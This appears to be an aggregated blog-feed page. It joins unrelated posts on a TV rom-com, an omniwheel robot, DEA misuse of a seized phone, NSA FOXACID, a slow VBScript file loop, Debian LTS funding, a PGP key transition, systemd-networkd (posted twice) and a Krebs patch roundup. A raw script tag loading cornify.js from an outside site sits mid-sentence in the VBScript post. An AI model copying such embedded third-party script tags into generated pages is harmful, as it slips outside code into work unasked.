    After everyone else has left the church, Henry and Eliza have it out. Henry doesn’t understand why Eliza would embarrass herself and him with such an obvious social faux pas, and he thinks he’s made a huge mistake by offering to help her. Eliza counters that maybe she’s the one who’s been helping him, since he didn’t even have a date for this wedding before he asked her. She then tells him exactly what she thinks of him: that he’s anti-social and holier-than-thou and un-fun, and at one point she even calls him a cockscomb. (John Cho’s hurt face when she calls him un-fun is my favorite thing in the entire episode.)

    “Oh, I’m a cockscomb, am I?” says Henry. “Well, you, my dear, are a
    lost cause.”

    And after storming out, it looks like both of them are ready to give up on the entire venture. But the next day at work, Eliza finds herself having a friendly conversation with Charmonique as if it’s completely natural, a conversation that has nothing to do with Eliza herself. “Whatever you’re doing with Mr. Man, it’s working,” says Charmonique.

    So Eliza goes to Henry’s house to apologize, and to explain that she hadn’t been on her phone from boredom, but because the wedding gave her feels (“Feels?” says a bewildered Henry, and I agree) that she wanted to suppress. And despite the scene playing out pretty much exactly as you’d expect – there’s even some gallivanting around in the rain to show how much Eliza and Henry are making a real connection – it’s still cute, and feels genuine enough to actually be the start of a wonderful friendship, or at least something close to it.

    Selfie started to confuse me a little with its My Fair Lady parallels, or lack thereof – because My Fair Lady is a story about changing a person’s outward behavior and mannerisms rather than looking inward.

    Sure, Higgins and Pickering think they are improving Eliza Doolittle’s character along with her elocution, but it’s clear that their perspectives come from their overweening class privilege. To them even the façade of a well-mannered and well-spoken lady is of more substance than the reality of a common flower girl. (Not that Higgins has much esteem for even the most respectable of women.)

    What has always kept My Fair Lady in a different category from the She’s All That rom-com formula is that, at the end of the story, neither Eliza nor Higgins have been substantially changed by each other.

    By the end, Eliza realizes that the process of “becoming a lady” may have even diminished her own personality and freedom, but she’s determined not to let that continue. Higgins’s heart is perhaps a little softened by Eliza’s influence, but really, just a very, very little – he’s still a snob and an unapologetic asshole. It’s a story about trying to use the tools of a rule-obsessed society against the very class that wields them. And in that aim, it’s a story with an ambiguous ending.

    So it’ll be interesting to see how Selfie interprets the original Henry Higgins – who knows the rules of his society but has enough privilege to get away with flouting them himself, and who definitely does not know much about being a good person – into this modern version, who “finds it rather easy not to form personal connections in a city that only values wireless connection”, whose curmudgeonly behavior seems to be because he’s written off modern American society as narcissistic and shallow.

    Is Selfie going to flip the original premise and go the simplistic-but-heartwarming route, trying to make the modern Eliza and Henry both “better people” who discover their “true selves” through their friendship (or maybe more)? Or is it going to be more complex than that?

    Hopefully, the fact that the cast features a number of actors of color will help add to that complexity.

    To take the character of Henry Higgins, who is the very definition of privilege in My Fair Lady (see, again, the song “I’m An Ordinary Man”, in which Higgins explains that all he expects from life is to be able to do whatever he wants, regardless of how it affects anyone else) and to take away or twist some of that privilege – it could turn out to be very interesting. The mere fact that John Cho is playing a rom-com lead in a sitcom not focused on race or ethnicity is groundbreaking – particularly since Asian men are often desexualized in popular culture. We’ll see if that gets addressed in ways that are less awkwardly humorous in the future (though “Kissing Koreans: Greenlight!” is a hilarious headline).

    I have similar hopes for black CEO Sam Saperstein, who is married to a white woman, and whose biracial daughter is marrying a white man, without comment – and Charmonique, who stole every scene she was in.

    Sitcoms tend to deal one of two ways with race – either offensively, or with willful “color-blindness” – but I think Selfie might be able to find a middle-ground instead.

    The post My Fair Selfie? appeared first on Racialicious - the intersection of race and pop culture.

    Planet Linux AustraliaBen Martin: Sliding around... spinning around.

    The wiring and electronics for the new omniwheel robot are coming together nicely. Having wired this up using 4 individual stepper controllers, one sees the value in commissioning a custom base board for the stepper drivers to plug into. I still have to connect an IMU to the beast, so precision strafing will (hopefully) be obtainable. The sparkfun mecanum video has the more traditional two wheels each side design, but does wobble a bit when strafing.


    Apart from the current requirements the new robot is also really heavy, probably heavier than Terry. I'm still working out what battery to use to meet the high current needs of four reasonable steppers on the move.

    CryptogramDEA Sets Up Fake Facebook Page in Woman's Name

    This is a creepy story. A woman has her phone seized by the Drug Enforcement Agency and gives them permission to look at her phone. Without her knowledge or consent, they steal photos off of the phone (the article says they were "racy") and use it to set up a fake Facebook page in her name.

    The woman sued the government over this. Extra creepy was the government's defense in court: "Defendants admit that Plaintiff did not give express permission for the use of photographs contained on her phone on an undercover Facebook page, but state the Plaintiff implicitly consented by granting access to the information stored in her cell phone and by consenting to the use of that information to aid in an ongoing criminal investigations [sic]."

    The article was edited to say: "Update: Facebook has removed the page and the Justice Department said it is reviewing the incident." So maybe this is just an overzealous agent and not official DEA policy.

    But as Marcy Wheeler said, this is a good reason to encrypt your cell phone.

    CryptogramFOXACID Operations Manual

    A few days ago, I saw this tweet: "Just a reminder that it is now *a full year* since Schneier cited it, and the FOXACID ops manual remains unpublished." It's true.

    The citation is this:

    According to a top-secret operational procedures manual provided by Edward Snowden, an exploit named Validator might be the default, but the NSA has a variety of options. The documentation mentions United Rake, Peddle Cheap, Packet Wrench, and Beach Head-­all delivered from a FOXACID subsystem called Ferret Cannon.

    Back when I broke the QUANTUM and FOXACID programs, I talked with the Guardian editors about publishing the manual. In the end, we decided not to, because the information in it wasn't useful to understanding the story. It's been a year since I've seen it, but I remember it being just what I called it: an operation procedures manual. It talked about what to type into which screens, and how to deal with error conditions. It didn't talk about capabilities, either technical or operational. I found it interesting, but it was hard to argue that it was necessary in order to understand the story.

    It will probably never be published. I lost access to the Snowden documents soon after writing that essay -- Greenwald broke with the Guardian, and I have never been invited back by the Intercept -- and there's no one looking at the documents with an eye to writing about the NSA's technical capabilities and how to securely design systems to protect against government surveillance. Even though we now know that the same capabilities are being used by other governments and cyber criminals, there's much more interest in stories with political ramifications.

    Planet Linux AustraliaAndrew Pollock: [life] Day 259: Kindergarten, more demos and play dates

    I was pretty exhausted after yesterday, so getting out of bed this morning took some serious effort. I started the day with a chiropractic adjustment and then got stuck into doing the obligatory "pre-cleaner clean" and preparing for my third Thermomix demonstration.

    The cleaners arrived and I headed off around the corner. My host thought the demo was starting at 10:30am, so I again had a bit of extra time up my sleeve.

    My Group Leader, Maria, came to observe this demo, and I thought she was just going to be incognito, but to my pleasant surprise, she actually helped out with some of the washing up throughout the demo, which made it easier.

    The demo went really well, and I was happy with how it went, and Maria gave me really positive feedback as well, so I was really stoked.

    I got home with enough time to collapse on the couch with a book for half an hour before I biked to Kindergarten to pick up Zoe.

    As we were heading out, I realised I'd left her helmet at home on her scooter. That's what I get for not putting it back on her bike trailer. So I sent her to Megan's house and biked home to pick up the helmet and headed back again. Two runs up Hawthorne Road in the afternoon heat was a good bit of exercise.

    After a brief play at Megan's, we headed home, and I started dinner. For some reason, I was super organised tonight and had dinner on the table nice and early, and everything cleaned up afterwards, so we had plenty of time to go out for a babyccino before bath time and bed time, and I still managed to get Zoe to bed a little early, and I didn't have any cleaning up to do afterwards.

    It's been a good day.

    Worse Than FailureCodeSOD: Line by Line

    In the bowels of a business unit, a director got a great deal on a third party software package. He bought it, without talking to corporate IT, and then was upset when it couldn’t gracefully integrate with any of the corporate IT assets. Eager to throw good money after bad, the director hired his nephew’s consultancy to build an integration tool to make his new toy work.

    A few months later, the users complained about performance, and somehow, fixing this thing became Jeff’s problem. The process was simple enough: slurp enterprise <script src="http://www.cornify.com/js/cornify.js" type="text/javascript"></script> data out of a text file, and pass the data on to the third-party tool. It didn’t take Jeff long to figure out why it performed poorly:

    Private Sub ProcessFile()
    
        &apos prepare to do stuff
    
        Do Until blnLastTime = True
            
            Set fileReader = fso.OpenTextFile(strFileName)
            
             If fileReader.AtEndOfStream = True Then
                blnLastTime = True
             Else
                strTextLine = fileReader.ReadLine
             End If
    
            &apos actually do stuff
             
            fileReader.Close
            Delete_Line (strFileName)
        Loop
        fileReader.Close
    
    End Sub
    
    
    
    Private Sub Delete_Line(strFile)
    
        Set fileReader = fso.OpenTextFile(strFile)
        
        If fso.FileExists(strFile & "2") Then
            fso.DeleteFile (strFile & "2")
        End If
        
        Set fileWriter = fso.CreateTextFile(strFile & 2)
        
        If fileReader.AtEndOfStream = False Then
            fileReader.ReadLine
        End If
        
        If fileReader.AtEndOfStream = False Then
                strLine = fileReader.ReadAll
                fileWriter.Write (strLine)
        End If
        
        
        fileReader.Close
        fileWriter.Close
    
        fso.DeleteFile strFile, True
        fso.CopyFile strFile & "2", strFile, True
        fso.DeleteFile strFile & 2, True
        
    End Sub

    Start by opening a file “foo.txt”. Read a single line from the file. Send it to the third party app. Close the file. Open “foo.txt” again. Open another file, called “foo.txt2”. Read the first line from “foo.txt”, again. Throw that away. Read the remainder of “foo.txt”, and write it to “foo.txt2”. Copy “foo.txt2” back over “foo.txt”. Now, go back to the top of the loop and read a single line from “foo.txt” again.

    <link href="http://yandex.st/highlightjs/7.3/styles/default.min.css" rel="stylesheet"/> <script src="http://img.thedailywtf.com/images/remy/highlight.js/highlight.pack.js"></script> <script>hljs.initHighlightingOnLoad();</script>

    So, for a 10,000 line file, this would perform 30,000 file open operations, write nearly 50 million lines, delete 20,000 files, and perform 10,000 copy operations. It didn’t take Jeff very long to rewrite this to simply read the file, one line at a time. The runtime dropped from a few hours to less than a minute.

    Planet DebianRaphaël Hertzog: Freexian’s second report about Debian Long Term Support

    Like last month, here comes a report about the work of paid contributors to Debian LTS.

    Individual reports

    In September 2014, 3 contributors have been paid for 11h each. Here are their individual reports:

    Evolution of the situation

    Compared to last month, we have gained 5 new sponsors, that’s great. We’re now at almost 25% of a full-time position. But we’re not done yet. We believe that we would need at least twice as many sponsored hours to do a reasonable work with at least the most used packages, and possibly four times as much to be able to cover the full archive.

    We’re now at 39 packages that need an update in Squeeze (+9 compared to last month), and the contributors paid by Freexian did handle 11 during last month (this gives an approximate rate of 3 hours per update, CVE triage included).

    Open questions

    Dear readers, what can we do to convince more companies to join the effort?

    The list of sponsors contains almost exclusively companies from Europe. It’s true that Freexian’s offer is in Euro but the economy is world-wide and it’s common to have international invoices. When Ivan Kohler asked if having an offer in dollar would help convince other companies, we got zero feedback.

    What are the main obstacles that you face when you try to convince your managers to get the company to contribute?

    By the way, we prefer that companies take small sponsorship commitments that they can afford over multiple years over granting lots of money now and then not being able to afford it for another year.

    Thanks to our sponsors

    Let me thank our main sponsors:

    Planet DebianMatthew Palmer: My entry in the "Least Used Software EVAH" competition

    For some reason, I seem to end up writing software for very esoteric use-cases. Today, though, I think I’ve outdone myself: I sat down and wrote a Ruby library to get and set process resource limits – those things that nobody ever thinks about except when they run out of file descriptors.

    I didn’t even have a direct need for it. Recently I was grovelling through the EventMachine codebase, looking at the filehandle limit code, and noticed that the pure-ruby implementation didn’t manipulate filehandle limits. I considered adding it, then realised that there wasn’t a library available to do it. Since I haven’t berked around with FFI for a while, I decided to write rlimit. Now to find the time to write that patch for EventMachine…

    Since I doubt there are many people who have a burning need to manipulate rlimits in Ruby, this gem will no doubt sit quiet and undisturbed in the dark, dusty corners of rubygems.org. However, for the three people on earth who find this useful: you’re welcome.

    ,

    Rondam RamblingsHarris, Aflek, Dawkins, oh my!

    It's been a busy couple of days for people who like to opine on the evils of Islam and Islamophobia.  Sam Harris and Ben Affleck kicked things off with a segment on Bill Maher's show where they had quite the scuffle over whether or not Harris was justified in his anti-Islamic rhetoric, or whether Affleck was trying to deny the truth in the name of political correctness. Lots and lots and lots of

    Planet DebianJulian Andres Klode: Key transition

    I started transitioning from 1024D to 4096R. The new key is available at:

    https://people.debian.org/~jak/pubkey.gpg

    and the keys.gnupg.net key server. A very short transition statement is available at:

    https://people.debian.org/~jak/transition-statement.txt

    and included below (the http version might get extended over time if needed).

    The key consists of one master key and 3 sub keys (signing, encryption, authentication). The sub keys are stored on an OpenPGP v2 Smartcard. That’s really cool, isn’t it?

    Somehow it seems that GnuPG 1.4.18 also works with 4096R keys on this smartcard (I accidentally used it instead of gpg2 and it worked fine), although only GPG 2.0.13 and newer is supposed to work.

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1,SHA512
    
    Because 1024D keys are not deemed secure enough anymore, I switched to
    a 4096R one.
    
    The old key will continue to be valid for some time, but i prefer all
    future correspondence to come to the new one.  I would also like this
    new key to be re-integrated into the web of trust.  This message is
    signed by both keys to certify the transition.
    
    the old key was:
    
    pub   1024D/00823EC2 2007-04-12
          Key fingerprint = D9D9 754A 4BBA 2E7D 0A0A  C024 AC2A 5FFE 0082 3EC2
    
    And the new key is:
    
    pub   4096R/6B031B00 2014-10-14 [expires: 2017-10-13]
          Key fingerprint = AEE1 C8AA AAF0 B768 4019  C546 021B 361B 6B03 1B00
    
    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v2
    
    iEYEARECAAYFAlQ9j+oACgkQrCpf/gCCPsKskgCgiRn7DoP5RASkaZZjpop9P8aG
    zhgAnjHeE8BXvTSkr7hccNb2tZsnqlTaiQIcBAEBCgAGBQJUPY/qAAoJENc8OeVl
    gLOGZiMP/1MHubKmA8aGDj8Ow5Uo4lkzp+A89vJqgbm9bjVrfjDHZQIdebYfWrjr
    RQzXdbIHnILYnUfYaOHUzMxpBHya3rFu6xbfKesR+jzQf8gxFXoBY7OQVL4Ycyss
    4Y++g9m4Lqm+IDyIhhDNY6mtFU9e3CkljI52p/CIqM7eUyBfyRJDRfeh6c40Pfx2
    AlNyFe+9JzYG1i3YG96Z8bKiVK5GpvyKWiggo08r3oqGvWyROYY9E4nLM9OJu8EL
    GuSNDCRJOhfnegWqKq+BRZUXA2wbTG0f8AxAuetdo6MKmVmHGcHxpIGFHqxO1QhV
    VM7VpMj+bxcevJ50BO5kylRrptlUugTaJ6il/o5sfgy1FdXGlgWCsIwmja2Z/fQr
    ycnqrtMVVYfln9IwDODItHx3hSwRoHnUxLWq8yY8gyx+//geZ0BROonXVy1YEo9a
    PDplOF1HKlaFAHv+Zq8wDWT8Lt1H2EecRFN+hov3+lU74ylnogZLS+bA7tqrjig0
    bZfCo7i9Z7ag4GvLWY5PvN4fbws/5Yz9L8I4CnrqCUtzJg4vyA44Kpo8iuQsIrhz
    CKDnsoehxS95YjiJcbL0Y63Ed4mkSaibUKfoYObv/k61XmBCNkmNAAuRwzV7d5q2
    /w3bSTB0O7FHcCxFDnn+tiLwgiTEQDYAP9nN97uibSUCbf98wl3/
    =VRZJ
    -----END PGP SIGNATURE-----
    

    Filed under: Uncategorized

    Planet DebianJoachim Breitner: Switching to systemd-networkd

    Ever since I read about systemd-networkd being in the making I was looking forward to try it out. I kept watching for the package to appear in Debian, or at least ITP bugs. A few days ago, by accident, I noticed that I already have systemd-networkd on my machine: It is simply shipped with the systemd package!

    My previous setup was a combination of ifplugd to detect when I plug or unplug the ethernet cable with a plain DHCP entry in /etc/network/interface. A while ago I was using guessnet to do a static setup depending on where I am, but I don’t need this flexibility any more, so the very simple approach with systemd-networkd is just fine with me. So after stopping ifplugd and

    $ cat > /etc/systemd/network/eth.network <<__END__
    [Match]
    Name=eth0
    [Network]
    DHCP=yes
    __END__
    $ systemctl enable systemd-networkd
    $ systemctl start systemd-networkd

    I was ready to go. Indeed, systemd-networkd, probably due to the integrated dhcp client, felt quite a bit faster than the old setup. And what’s more important (and my main motivation for the switch): It did the right thing when I put it to sleep in my office, unplug it there, go home, plug it in and wake it up. ifplugd failed to detect this change and I often had to manually run ifdown eth0 && ifup eth0; this now works.

    But then I was bitten by what I guess some people call the viral nature of systemd: systemd-networkd would not update /etc/resolve.conf, but rather relies on systemd-resolved. And that requires me to change /etc/resolve.conf to be a symlink to /run/systemd/resolve/resolv.conf. But of course I also use my wireless adapter, which, at that point, was still managed using ifupdown, which would use dhclient which updates /etc/resolve.conf directly.

    So I investigated if I can use systemd-networkd also for my wireless account. I am not using NetworkManager or the like, but rather keep wpa_supplicant running in roaming mode, controlled from ifupdown (not sure how that exactly works and what controls what, but it worked). I found out that this setup works just fine with systemd-networkd: I start wpa_supplicant with this service file (which I found in the wpasupplicant repo, but not yet in the Debian package):

    [Unit]
    Description=WPA supplicant daemon (interface-specific version)
    Requires=sys-subsystem-net-devices-%i.device
    After=sys-subsystem-net-devices-%i.device
    
    [Service]
    Type=simple
    ExecStart=/sbin/wpa_supplicant -c/etc/wpa_supplicant/wpa_supplicant-%I.conf -i%I
    
    [Install]
    Alias=multi-user.target.wants/wpa_supplicant@%i.service

    Then wpa_supplicant will get the interface up and down as it goes, while systemd-networkd, equipped with

    [Match]
    Name=wlan0
    [Network]
    DHCP=yes

    does the rest.

    So suddenly I have a system without /etc/init.d/networking and without ifup. Feels a bit strange, but also makes sense. I still need to migrate how I manage my UMTS modem device to that model.

    The only thing that I’m missing so far is a way to trigger actions when the network configuration has changes, like I could with /etc/network/if-up.d/ etc. I want to run things like killall -ALRM tincd and exim -qf. If you know how to do that, please tell me, or answer over at Stack Exchange.

    TEDMusings of a male granny: This retired schoolteacher spends his free time Skyping with Indian schoolkids

    Kids at TK school gather around as David TK leads them in a clas..

    Kids at a school in India gather around a computer as David Swancott leads a School in the Cloud session.

    David Swancott is a retired biology teacher who lives an hour southeast of Bordeaux, France. He spends his free time bicycling, traveling and, for the past two years, being a “Skype Granny.” Swancott is a part of the “Granny Cloud,” a project created by 2013 TED Prize winner Sugata Mitra to make teachers available online to mentor children participating in his School in the Cloud. As children explore the big questions that matter to them, they get nudges in the right direction from a Skype Granny. But don’t let the name fool you. While many Granny Cloud participants are female and retired, just as many are male or in their 20s, 30s and 40s.

    Now that the school year is underway, the TED Prize Blog checked in with one of our male grannies to ask about his experience mentoring kids through the Granny Cloud.

    You’re retired, living in the countryside. What inspired you to become a Skype Granny for School in the Cloud?

    I found out about it on television—on the BBC’s The One Show, which follows the evening news. They did a segment about the Granny Cloud, and it stirred my interest. I thought, “That’s something I might like to be involved with.” I missed being in contact with children. So I got in touch with the contact provided on the show’s website, downloaded an application form and, after an interview and orientation, I became a Skype Granny. Once a teacher, always a teacher.

    Every Tuesday morning, you Skype with young students at two different schools in India. Can you talk us through a typical session?

    Last week, one group came on and immediately wanted to know about butterflies. So as time was tight, I quickly hunted out a National Geographic video on the monarch butterfly and we watched that. Afterwards, we talked through what they’d seen. I asked questions and together we explored the life cycle of a butterfly.

    Sessions last between 30 and 45 minutes. We usually start by spending some time talking about the things that have happened during the week, then I show them some photos or a video or written material, usually on a topic they decided on the week before. We spend time talking about the material. I try to get them to input as much as possible — picking out new vocabulary, checking spelling and so on.

    You’re the grandfather of two young boys and taught high school in England for more than 40 years, which means you must be very patient. What are some challenges you’ve come across being a Skype Granny?

    Well, you have to think on your feet a bit sometimes and be willing to move with the children if they go off on a tangent. Quite often, there are problems with sound or vision or even both, and we have to resort to communication by text. There’s also no guarantee that the Internet will work at all, as the facilities in some areas are so poor. On one occasion, the line to the school was attacked by monkeys and it took a while for it to be repaired, as the school is in a very remote area.

    Granny-Cloud-main

    Another School in the Cloud session, with kids gathered around a computer.

    What’s the best thing about being a Skype Granny?

    The children’s enthusiasm, their willingness to learn and their appreciation of my involvement as a granny. Recently, I’ve been experiencing some heart problems and when I re-started the sessions after my illness, the children at one of the schools had made these lovely “Get Well Soon” cards for me, which they were able to show to me during one of our sessions. What a tonic that was! And, unlike some of the children in England, when they see you, they smile. They are happy to be there. And they have a contagious enthusiasm, which I think is what keeps me going and makes me want to do more for them.

    What do you think makes a good teacher?

    Teaching is about creating and providing a supportive environment in which a child can learn. A good teacher acts as a facilitator for that child’s learning. The UK government started fiddling around with education, and that’s one of the things that drove me away from teaching – we moved to a very prescribed curriculum with little or no time to drift sideways and explore other facets of a subject or respond to students’ questions or thoughts. The school’s examination results became the most important thing, but it’s much more than that! Overall, I think a good teacher must be able to work within the constraints of the existing system, have an enthusiasm for their subject, and be able to engage students and get them involved with their own learning.

    What do you think is the future of learning?

    The use of technology in schools is changing the way we learn, what we learn, and what the shape of the curriculum should be in the future. I was a teacher during an era when computers first appeared in schools — to be used by teachers, certainly not for students. Now in many schools, the students all have their own computers or tablets. I never envisaged being able to communicate with a school in India on a regular basis, and now look what I am doing! Technology opens up many opportunities for different approaches to learning. Within this, children need to be allowed to take more charge of their learning, with the teacher acting in a more supporting role. Letting go, allowing this to happen, is a big challenge for teachers, as there is security when you are setting out the agenda. But really, this approach doesn’t take anything away from the role of the teacher. We will continue to be instrumental in setting up these learning situations.

    Learn more about becoming a Skype Granny »

    Find out more about Sugata Mitra’s TED Prize wish »


    Krebs on SecurityMicrosoft, Adobe Push Critical Security Fixes

    Adobe, Microsoft and Oracle each released updates today to plug critical security holes in their products. Adobe released patches for its Flash Player and Adobe AIR software. A patch from Oracle fixes at least 25 flaws in Java. And Microsoft pushed patches to fix at least two-dozen vulnerabilities in a number of Windows components, including Office, Internet Explorer and .NET. One of the updates addresses a zero-day flaw that reportedly is already being exploited in active cyber espionage attacks.

    brokenwindowsEarlier today, iSight Partners released research on a threat the company has dubbed “Sandworm” that exploits one of the vulnerabilities being patched today (CVE-2014-4114). iSight said it discovered that Russian hackers have been conducting cyber espionage campaigns using the flaw, which is apparently present in every supported version of Windows. The New York Times carried a story today about the extent of the attacks against this flaw.

    In its advisory on the zero-day vulnerability, Microsoft said the bug could allow remote code execution if a user opens a specially crafted malicious Microsoft Office document. According to iSight, the flaw was used in targeted email attacks that targeted NATO, Ukrainian and Western government organizations, and firms in the energy sector.

    More than half of the other vulnerabilities fixed in this month’s patch batch address flaws in Internet Explorer. Additional details about the individual Microsoft patches released today is available at this link.

    brokenflash-aSeparately, Adobe issued its usual round of updates for its Flash Player and AIR products. The patches plug at least three distinct security holes in these products. Adobe says it’s not aware of any active attacks against these vulnerabilities. Updates are available for Windows, Mac and Linux versions of Flash.

    Adobe says users of the Adobe Flash Player desktop runtime for Windows and Macintosh should update to Adobe Flash Player 15.0.0.189. To see which version of Flash you have installed, check this link. IE10/IE11 on Windows 8.x and Chrome should auto-update their versions of Flash, although my installation of Chrome says it is up-to-date and yet is still running v. 15.0.0.152 (with no outstanding updates available, and no word yet from Chrome about when the fix might be available).

    The most recent versions of Flash are available from the Flash home page, but beware potentially unwanted add-ons, like McAfee Security Scan. To avoid this, uncheck the pre-checked box before downloading, or grab your OS-specific Flash download from here.

    Windows users who browse the Web with anything other than Internet Explorer may need to apply this patch twice, once with IE and again using the alternative browser (Firefox, Opera, e.g.). If you have Adobe AIR installed, you’ll want to update this program. AIR ships with an auto-update function that should prompt users to update when they start an application that requires it; the newest, patched version is v. 15.0.0.293 for Windows, Mac, and Android.

    Finally, Oracle is releasing an update for its Java software today that corrects more than two-dozen security flaws in the software. Oracle says 22 of these vulnerabilities may be remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password. Java SE 8 updates are available here; the latest version of Java SE 7 is here.

    If you really need and use Java for specific Web sites or applications, take a few minutes to update this software. Updates are available from Java.com or via the Java Control Panel. I don’t have an installation of Java handy on the machine I’m using to compose this post, but keep in mind that updating via the control panel may auto-select the installation of third-party software, so de-select that if you don’t want the added crapware.

    javamessOtherwise, seriously consider removing Java altogether. I’ve long urged end users to junk Java unless they have a specific use for it (this advice does not scale for businesses, which often have legacy and custom applications that rely on Java). This widely installed and powerful program is riddled with security holes, and is a top target of malware writers and miscreants.

    If you have an affirmative use or need for Java, unplug it from the browser unless and until you’re at a site that requires it (or at least take advantage of click-to-play). The latest versions of Java let users disable Java content in web browsers through the Java Control Panel. Alternatively, consider a dual-browser approach, unplugging Java from the browser you use for everyday surfing, and leaving it plugged in to a second browser that you only use for sites that require Java.

    For Java power users — or for those who are having trouble upgrading or removing a stubborn older version — I recommend JavaRa, which can assist in repairing or removing Java when other methods fail (requires the Microsoft .NET Framework, which also received updates today from Microsoft).

    Planet DebianJoachim Breitner: Switching to sytemd-networkd

    Ever since I read about sytemd-networkd being in the making I was looking forward to try it out. I kept watching for the package to appear in Debian, or at least ITP bugs. A few days ago, by accident, I noticed that I already have systemd-networkd on my machine: It is simply shipped with the systemd package!

    My previous setup was a combination of ifplugd to detect when I plug or unplug the ethernet cable with a plain DHCP entry in /etc/network/interface. A while ago I was using guessnet to do a static setup depending on where I am, but I don’t need this flexibility any more, so the very simple approach with systemd-networkd is just fine with me. So after stopping ifplugd and

    $ cat > /etc/systemd/network/eth.network <<__END__
    [Match]
    Name=eth0
    [Network]
    DHCP=yes
    __END__
    $ systemctl enable systemd-networkd
    $ systemctl start systemd-networkd

    I was ready to go. Indeed, systemd-networkd, probably due to the integrated dhcp client, felt quite a bit faster than the old setup. And what’s more important (and my main motivation for the switch): It did the right thing when I put it to sleep in my office, unplug it there, go home, plug it in and wake it up. ifplugd failed to detect this change and I often had to manually run ifdown eth0 && ifup eth0; this now works.

    But then I was bitten by what I guess some people call the viral nature of systemd: sytemd-networkd would not update /etc/resolve.conf, but rather relies on systemd-resolved. And that requires me to change /etc/resolve.conf to be a symlink to /run/systemd/resolve/resolv.conf. But of course I also use my wireless adapter, which, at that point, was still managed using ifupdown, which would use dhclient which updates /etc/resolve.conf directly.

    So I investigated if I can use systemd-networkd also for my wireless account. I am not using NetworkManager or the like, but rather keep wpa_supplicant running in roaming mode, controlled from ifupdown (not sure how that exactly works and what controls what, but it worked). I found out that this setup works just fine with systemd-networkd: I start wpa_supplicant with this service file (which I found in the wpasupplicant repo, but not yet in the Debian package):

    [Unit]
    Description=WPA supplicant daemon (interface-specific version)
    Requires=sys-subsystem-net-devices-%i.device
    After=sys-subsystem-net-devices-%i.device
    
    [Service]
    Type=simple
    ExecStart=/sbin/wpa_supplicant -c/etc/wpa_supplicant/wpa_supplicant-%I.conf -i%I
    
    [Install]
    Alias=multi-user.target.wants/wpa_supplicant@%i.service

    Then wpa_supplicant will get the interface up and down as it goes, while systemd-networkd, equipped with

    [Match]
    Name=wlan0
    [Network]
    DHCP=yes

    does the rest.

    So suddenly I have a system without /etc/init.d/networking and without ifup. Feels a bit strange, but also makes sense. I still need to migrate how I manage my UMTS modem device to that model.

    The only thing that I’m missing so far is a way to trigger actions when the network configuration has changes, like I could with /etc/network/if-up.d/ etc. I want to run things like killall -ALRM tincd and exim -qf. If you know how to do that, please tell me, or answer over at Stack Exchange.

    Rondam RamblingsParallel universes and the arrow of time

    In a previous post about quantum mechanics and parallel universes I ended with a puzzle: All measurements are in principle reversible. Imagine that we could actually carry out this program of undoing the myriad entanglements that constitute your making a particular observation. What would be the subjective sensation, i.e. what would it "feel like" if this were done to you? If you haven't read

    Planet DebianGunnar Wolf: When Open Access meets the Napster anniversary

    Two causally unrelated events which fit in together in the greater scheme of things ;-)

    In some areas, the world is better aligning to what we have been seeking for many years. In some, of course, it is not.

    In this case, today I found our article on the Network of Digital Repositories for our University, in the Revista Digital Universitaria [en línea] was published. We were invited to prepare an article on this topic because this month's magazine would be devoted to Open Access in Mexico and Latin America — This, because a law was recently passed that makes conditions much more interesting for the nonrestricted publication of academic research. Of course, there is still a long way to go, but this clearly is a step in the right direction.

    On the other hand, after a long time of not looking in that direction (even though it's a lovely magazine), I found that this edition of FirstMonday takes as its main topic Napster, 15 years on: Rethinking digital music distribution.

    I know that nonrestricted academic publishing via open access and nonauthorized music sharing via Napster are two very different topics. However, there is a continuous push and trend towards considering and accepting open licensing terms, and they are both points in the same struggle. An interesting data point to add is that, although many different free licenses have existed over time, Creative Commons (which gave a lot of visibility and made the discussion within the reach of many content creators) was created in 2001 — 13 years ago today, two years after Napster. And, yes, there are no absolute coincidences.

    Geek FeminismAll about my linkspam (14 October 2014)

    #GamerGate

    A few more links about the Grace Hopper Celebration Ally Panel


    We link to a variety of sources, some of which are personal blogs.  If you visit other sites linked herein, we ask that you respect the commenting policy and individual culture of those sites.

    You can suggest links for future linkspams in comments here, or by using the “geekfeminism” tag on Pinboard, Delicious or Diigo; or the “#geekfeminism” tag on Twitter. Please note that we tend to stick to publishing recent links (from the last month or so).

    Thanks to everyone who suggested links.

    Planet DebianMarco d'Itri: The Italian peering ecosystem

    I published the slides of my talk "An introduction to peering in Italy - Interconnections among the Italian networks" that I presented today at the MIX-IT (the Milano internet exchange) technical meeting.

    TED“National boundaries are not respected by infectious diseases”: A Q&A on the Ebola epidemic at TEDGlobal 2014

    Chikwe Ihekweazu in a fascinating Q&A about the Ebola epidemic at TEDGlobal 2014. Photo: Ryan Lash/TED

    Chikwe Ihekweazu in a fascinating Q&A about the Ebola epidemic at TEDGlobal 2014. Photo: Ryan Lash/TED

    Ten years ago, epidemiologist Chikwe Ihekweazu helped fight an outbreak in South Sudan. This TED Fellow now runs the health consultancy EpiAFRIC, writes about public health issues in his native Nigeria, and is soon to start a four-week rotation on the ground fighting the Ebola epidemic. So as the outbreak continues, he sat down for a Q&A with Chris Anderson in Session 11 to give insights into what is happening and how concerned we all should be.

    The first question: Can we get the scientific overview of what Ebola is and how it makes people sick?

    Ihekweazu gives the disconcerting answer that, unlike some other viruses, we don’t know what the natural host is for Ebola. We do, however, know that in humans it is passed through contact with bodily fluids. We know that the disease has an incubation period of 2 to 21 days and that, unlike many other viruses, you can’t actually transmit the virus unless you are ill. “Most outbreaks are relatively small,” says Ihekweazu. In the South Sudan outbreak he helped fight a decade ago, there were less than 30 cases.

    This time around, things are much worse. As of this moment, there have been close to 8,000 cases and 4,000 deaths. “This is really the worst outbreak we’ve ever dealt with — there’s really been nothing close,” says Ihekweazu. Public health advocates have one main tactic from here: to stop the chain of transmission from one sick person to another. Those most at risk for infection are family members of those already infected, health care workers and people involved in funeral rites.

    The difficulty of fighting the Ebola epidemic in Africa connects to larger currents on the global stage. To illustrate this, Ihekweazu shows us two highly distorted maps of the world. The first illustrates the global deaths from infectious diseases— in this map, Africa and India are severely bloated, while the Americas appear as just a sliver. The next map shows public health spending in the world—here, the United States and Europe appear gigantic, while Africa becomes a thin line. Ihekweazu drops the shocking fact that there is one doctor to every 100,000 people in Liberia. “For Ebola to cause an outbreak, it probably picked the best two or three countries to happen in,” he says.

